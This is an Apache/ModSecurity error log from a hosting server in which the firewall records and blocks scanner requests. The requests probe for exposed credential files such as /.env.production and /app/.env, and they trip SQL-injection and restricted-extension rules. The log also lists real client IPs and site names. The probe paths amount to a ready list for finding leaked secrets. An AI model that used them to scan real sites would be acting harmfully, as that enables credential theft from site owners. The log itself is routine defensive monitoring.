[Mon May 11 22:43:08.914362 2026] [security2:error] [pid 1605480:tid 1605528] [client 5.255.126.76:33848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.bak"] [unique_id "agI_XB2Cvzd_nyNfUm8EmAAAAQY"]
[Mon May 11 22:43:08.914536 2026] [security2:error] [pid 1605480:tid 1605528] [client 5.255.126.76:33848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.bak"] [unique_id "agI_XB2Cvzd_nyNfUm8EmAAAAQY"]
[Mon May 11 22:43:08.914539 2026] [security2:error] [pid 1588898:tid 1588909] [client 5.255.126.76:33936] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.example"] [unique_id "agI_XKFW67LJTsgN3jQRLQAAAAo"]
[Mon May 11 22:43:08.914751 2026] [security2:error] [pid 1605480:tid 1605528] [client 5.255.126.76:33848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.bak"] [unique_id "agI_XB2Cvzd_nyNfUm8EmAAAAQY"]
[Mon May 11 22:43:08.913283 2026] [security2:error] [pid 1606352:tid 1606431] [client 5.255.126.76:33834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.production"] [unique_id "agI_XHo_DFxNSZVmaX3WkAAAAMw"]
[Mon May 11 22:43:08.915022 2026] [security2:error] [pid 1606352:tid 1606431] [client 5.255.126.76:33834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.production"] [unique_id "agI_XHo_DFxNSZVmaX3WkAAAAMw"]
[Mon May 11 22:43:08.915239 2026] [security2:error] [pid 1606352:tid 1606431] [client 5.255.126.76:33834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.production"] [unique_id "agI_XHo_DFxNSZVmaX3WkAAAAMw"]
[Mon May 11 22:43:08.914865 2026] [security2:error] [pid 1590352:tid 1590411] [client 5.255.126.76:34016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.test"] [unique_id "agI_XK1q0G_aXAqWauQASwAAAJM"]
[Mon May 11 22:43:08.915446 2026] [security2:error] [pid 1590352:tid 1590411] [client 5.255.126.76:34016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.test"] [unique_id "agI_XK1q0G_aXAqWauQASwAAAJM"]
[Mon May 11 22:43:08.915816 2026] [security2:error] [pid 1590352:tid 1590411] [client 5.255.126.76:34016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.test"] [unique_id "agI_XK1q0G_aXAqWauQASwAAAJM"]
[Mon May 11 22:43:08.943550 2026] [security2:error] [pid 1588898:tid 1588921] [client 5.255.126.76:33812] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agI_XKFW67LJTsgN3jQRLgAAABc"]
[Mon May 11 22:43:08.943764 2026] [security2:error] [pid 1588898:tid 1588921] [client 5.255.126.76:33812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agI_XKFW67LJTsgN3jQRLgAAABc"]
[Mon May 11 22:43:08.943991 2026] [security2:error] [pid 1588898:tid 1588921] [client 5.255.126.76:33812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agI_XKFW67LJTsgN3jQRLgAAABc"]
[Mon May 11 22:43:08.947946 2026] [security2:error] [pid 1590352:tid 1590409] [client 5.255.126.76:34068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agI_XK1q0G_aXAqWauQATAAAAJE"]
[Mon May 11 22:43:08.948132 2026] [security2:error] [pid 1590352:tid 1590409] [client 5.255.126.76:34068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agI_XK1q0G_aXAqWauQATAAAAJE"]
[Mon May 11 22:43:08.948358 2026] [security2:error] [pid 1590352:tid 1590409] [client 5.255.126.76:34068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/app/.env"] [unique_id "agI_XK1q0G_aXAqWauQATAAAAJE"]
[Mon May 11 22:43:31.191563 2026] [security2:error] [pid 1590352:tid 1590393] [client 43.162.114.69:54544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agI_c61q0G_aXAqWauQAbAAAAIE"], referer: http://krakoukas.com
[Mon May 11 22:44:10.081331 2026] [authz_core:error] [pid 1590352:tid 1590408] [client 17.241.75.41:51794] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sodium_compat/namespaced/error_log
[Mon May 11 22:44:14.904512 2026] [security2:error] [pid 1605480:tid 1605524] [client 139.155.134.17:59912] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "moncampingcarenligne.com"] [uri "/"] [unique_id "agI_nh2Cvzd_nyNfUm8E7wAAAQI"]
[Mon May 11 22:44:39.183902 2026] [security2:error] [pid 1588898:tid 1588911] [client 43.165.170.119:52400] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/xmlrpc.php"] [unique_id "agI_t6FW67LJTsgN3jQRiwAAAAw"]
[Mon May 11 22:44:45.058334 2026] [security2:error] [pid 1606352:tid 1606438] [client 43.128.89.111:44430] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.classist.fr"] [uri "/"] [unique_id "agI_vXo_DFxNSZVmaX3W_wAAANM"]
[Mon May 11 22:44:46.283855 2026] [security2:error] [pid 1534836:tid 1534891] [client 176.65.139.229:58476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/app/.env"] [unique_id "agI_vteaRXe5lR8y0ZO7swAAAVQ"]
[Mon May 11 22:44:46.284082 2026] [security2:error] [pid 1534836:tid 1534891] [client 176.65.139.229:58476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/app/.env"] [unique_id "agI_vteaRXe5lR8y0ZO7swAAAVQ"]
[Mon May 11 22:44:46.287007 2026] [security2:error] [pid 1534836:tid 1534891] [client 176.65.139.229:58476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agI_vteaRXe5lR8y0ZO7swAAAVQ"]
[Mon May 11 22:44:53.158697 2026] [security2:error] [pid 1605480:tid 1605535] [client 216.73.217.28:3737] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/www.piregwan-genesis.com/liens/sociedaddeinternet.com"] [unique_id "agI_xR2Cvzd_nyNfUm8FGgAAAQ0"], referer: https://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2Fwww.piregwan-genesis.com%2Fliens%2Fsociedaddeinternet.com
[Mon May 11 22:44:53.159082 2026] [security2:error] [pid 1605480:tid 1605535] [client 216.73.217.28:3737] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/www.piregwan-genesis.com/liens/sociedaddeinternet.com"] [unique_id "agI_xR2Cvzd_nyNfUm8FGgAAAQ0"], referer: https://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2Fwww.piregwan-genesis.com%2Fliens%2Fsociedaddeinternet.com
[Mon May 11 22:44:53.159338 2026] [security2:error] [pid 1605480:tid 1605535] [client 216.73.217.28:3737] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/www.piregwan-genesis.com/liens/sociedaddeinternet.com"] [unique_id "agI_xR2Cvzd_nyNfUm8FGgAAAQ0"], referer: https://www.piregwan-genesis.com/liens/redirect.php?url=https%3A%2Fwww.piregwan-genesis.com%2Fliens%2Fsociedaddeinternet.com
[Mon May 11 22:45:13.636992 2026] [security2:error] [pid 1590352:tid 1590416] [client 43.153.192.98:49348] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-json/wp/v2/pages/7"] [unique_id "agI_2a1q0G_aXAqWauQBQgAAAJg"]
[Mon May 11 22:45:47.722758 2026] [security2:error] [pid 1590352:tid 1590410] [client 43.134.71.232:55264] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/cession-reprise-dentreprise-en-difficulte/"] [unique_id "agI_-61q0G_aXAqWauQBdgAAAJI"]
[Mon May 11 22:45:59.972390 2026] [security2:error] [pid 1605480:tid 1605546] [client 43.173.1.69:57274] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/douche/"] [unique_id "agJABx2Cvzd_nyNfUm8FigAAARg"]
[Mon May 11 22:46:00.206280 2026] [security2:error] [pid 1588898:tid 1588902] [client 45.117.63.159:54732] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: 42eaf0494ff7e5039a7c6eba39769549||1778534138||1778533778"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJACKFW67LJTsgN3jQSBQAAAAM"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 22:46:00.206549 2026] [security2:error] [pid 1588898:tid 1588902] [client 45.117.63.159:54732] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJACKFW67LJTsgN3jQSBQAAAAM"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 22:46:00.207151 2026] [security2:error] [pid 1588898:tid 1588902] [client 45.117.63.159:54732] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJACKFW67LJTsgN3jQSBQAAAAM"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 22:46:01.005544 2026] [security2:error] [pid 1605480:tid 1605533] [client 45.117.63.159:54757] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: 42eaf0494ff7e5039a7c6eba39769549||1778534138||1778533778"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJACR2Cvzd_nyNfUm8FiwAAAQs"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 22:46:01.005788 2026] [security2:error] [pid 1605480:tid 1605533] [client 45.117.63.159:54757] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJACR2Cvzd_nyNfUm8FiwAAAQs"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 22:46:01.006426 2026] [security2:error] [pid 1605480:tid 1605533] [client 45.117.63.159:54757] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJACR2Cvzd_nyNfUm8FiwAAAQs"], referer: https://la-grande-fabrique.com/?p=4057
[Mon May 11 22:46:17.000588 2026] [ssl:error] [pid 1606352:tid 1606422] (EAI 2)Name or service not known: [client 142.147.162.75:29560] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 22:46:17.000849 2026] [ssl:error] [pid 1606352:tid 1606422] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:18.348003 2026] [ssl:error] [pid 1588898:tid 1588918] (EAI 2)Name or service not known: [client 66.249.69.107:40643] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:18.348047 2026] [ssl:error] [pid 1588898:tid 1588918] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:18.391699 2026] [ssl:error] [pid 1590352:tid 1590396] (EAI 2)Name or service not known: [client 166.0.136.15:30804] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 22:46:18.391740 2026] [ssl:error] [pid 1590352:tid 1590396] AH01941: stapling_renew_response: responder error
[Mon May 11 22:46:18.767079 2026] [ssl:error] [pid 1588898:tid 1588911] (EAI 2)Name or service not known: [client 66.249.69.106:44894] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:46:18.767110 2026] [ssl:error] [pid 1588898:tid 1588911] AH01941: stapling_renew_response: responder error
